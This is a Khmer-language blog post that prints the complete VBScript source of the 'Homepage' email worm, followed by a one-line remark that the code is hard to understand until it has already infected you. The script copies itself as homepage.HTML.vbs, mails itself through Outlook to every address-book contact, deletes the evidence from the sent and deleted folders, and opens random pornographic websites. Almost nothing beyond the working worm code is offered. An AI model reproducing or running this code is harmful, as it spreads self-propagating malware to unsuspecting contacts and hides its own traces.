កូដមេរោគស្អីគេអីចេះ? (កូដទី១)


On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
 Set Mapi=Outlook.GetNameSpace("MAPI")
 Set Lists=Mapi.AddressLists
 For Each ListIndex In Lists
 If ListIndex.AddressEntries.Count <> 0 Then
  ContactCount = ListIndex.AddressEntries.Count
  For Count= 1 To ContactCount
  Set Mail = Outlook.CreateItem(0)
  Set Contact = ListIndex.AddressEntries(Count)
  Mail.To = Contact.Address
  Mail.Subject = "Homepage"
  Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
  Set Attachment=Mail.Attachments
  Attachment.Add Folder & "\homepage.HTML.vbs"
  Mail.DeleteAfterSubmit = True
  If Mail.To <> "" Then
  Mail.Send
  WS.regwrite "HKCU\software\An\mailed", "1"
  End If
  Next
 End If
 Next
End if
End Function

មើលអត់យល់ ពេលដែលយល់គឺមេរោគចូលបាត់

About Nataro

ក្នុងលោក គ្មានអ្វីដែលល្អគ្រប់ដប់នោះទេ
This entry was posted in កុំព្យូទ័រ, ចំនេះដឹង and tagged , , . Bookmark the permalink.

ឆ្លើយ​តប

Fill in your details below or click an icon to log in:

ឡូហ្កូ WordPress.com

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី WordPress.com របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

រូប Twitter

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Twitter របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

រូបថត Facebook

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Facebook របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

Google+ photo

អ្នក​កំពុង​បញ្ចេញ​មតិ​ដោយ​ប្រើ​គណនី Google+ របស់​អ្នក​។ Log Out / ផ្លាស់ប្តូរ )

កំពុង​ភ្ជាប់​ទៅ​កាន់ %s